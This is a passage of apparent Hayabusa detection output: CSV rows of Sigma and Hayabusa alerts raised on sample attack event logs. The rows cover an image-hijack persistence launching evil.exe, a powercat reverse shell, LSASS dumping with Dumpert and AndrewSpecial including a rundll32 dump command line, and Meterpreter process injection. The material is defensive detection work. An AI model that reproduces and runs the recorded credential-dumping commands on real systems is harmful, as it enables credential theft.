365ABB72-6F63-5D0A-0000-0010F93A1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:45.694 +00:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,GlobalFlags Registry Persistence 
Mechanisms,,rules/sigma/registry_sysmon/registry_set/registry_set_globalflags_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:55.397 +00:00,IEWIN7,1,info,,Process Created,"Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1352 | PGUID: 365ABB72-6F6F-5D0A-0000-001046451300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:58.944 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0 | LID: 0x134a4 | PID: 2112 | PGUID: 365ABB72-6F72-5D0A-0000-001004551300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:58.944 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:01.928 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1224 | PGUID: 365ABB72-6F75-5D0A-0000-001082611300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:01.990 
+00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-6F75-5D0A-0000-0010E5671300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:02.350 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin | Process: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe | User: IEWIN7\IEUser | Parent Cmd: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1] | LID: 0x134fc | PID: 3744 | PGUID: 365ABB72-6F76-5D0A-0000-001064701300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:10.334 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x134fc | PID: 2396 | PGUID: 365ABB72-6F7C-5D0A-0000-0010FE201400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:11.694 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0 | LID: 0x134fc | PID: 3800 | PGUID: 
365ABB72-6F7F-5D0A-0000-0010B66E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:11.694 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 08:07:42.331 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\NETSTAT.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1284 | Tgt PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:42.331 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NETSTAT.EXE"" -na | Process: C:\Windows\System32\NETSTAT.EXE | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1284 | PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:42.331 +00:00,IEWIN7,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:42.331 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.909 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt 
Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 888 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.909 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 888 | PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.909 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.925 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1440 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.925 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1440 | PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.925 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:50.378 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:4444 (IEWIN7) | Dst: 10.0.2.18:38208 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 816 | PGUID: 365ABB72-3D05-5D0B-0000-001004220D00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:52.956 +00:00,IEWIN7,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 1476 | PGUID: 365ABB72-3ED8-5D0B-0000-0010398F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:52.956 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:52.956 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:58.816 +00:00,IEWIN7,1,info,,Process Created,"Cmd: systeminfo | Process: C:\Windows\System32\systeminfo.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 3820 | PGUID: 365ABB72-3EDE-5D0B-0000-001032961A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:58.816 +00:00,IEWIN7,1,low,Disc,Suspicious Execution of 
Systeminfo,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_systeminfo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-21 07:35:37.185 +00:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Outflank-Dumpert.exe | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Hash: SHA1=3A41FF5A6CDEC8829876E0486A0072BC8D13DCF1,MD5=D4940C501545BCFD11D6DC75B5D0FEC9,SHA256=38879FE4AA25044DB241B093E6A1CF904BA9F4E999041C0CC039E2D5F7ABA044,IMPHASH=88788EE624180BE467F3C32F4720AA97",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.185 +00:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.329 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.329 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | 
Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.329 +00:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.329 +00:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_win_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.329 +00:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.377 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.377 +00:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 
07:35:50.128 +00:00,alice.insecurebank.local,1,info,,Process Created,"Cmd: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump | Process: C:\Windows\System32\rundll32.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.259 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.259 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.259 +00:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.259 +00:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_win_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 
+2019-06-21 07:35:50.264 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.729 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.729 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.729 +00:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.729 +00:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_win_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.749 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:50.450 +00:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: AndrewSpecial.exe | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Hash: SHA1=FE6BEB0E26F71F8587415507B318B161FBC3338B,MD5=4791C98C096587DB8DFECD5CA894DD56,SHA256=2969E70B74A12E3B0441D0BDA498322464A8614421B00321E889756D60AB4200,IMPHASH=40B5A4911712471B34D39C3AC7E99193",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:50.450 +00:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:51.681 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\Desktop\Andrew.dmp | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | PID: 3552 | PGUID: 
ECAD0485-8912-5D0C-0000-0010FD2F1F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:51.681 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:51.681 +00:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:51.682 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-07-03 20:10:06.475 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Lateral Movement - New Named Pipe added to NullSession | SetValue: HKLM\System\CurrentControlSet\services\LanmanServer\Parameters\NullSessionPipes: Binary Data | Process: C:\Windows\system32\reg.exe | PID: 3844 | PGUID: 
365ABB72-0B9E-5D1D-0000-00100BF40D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_add_new_namedpipe_tp_nullsession_registry_turla_like_ttp.evtx +2019-07-03 20:39:29.223 +00:00,IEWIN7,10,low,,Process Access,Src Process: ㄀ | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:29.223 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.129 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.129 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.129 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread 
Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.129 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.145 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.145 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.145 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
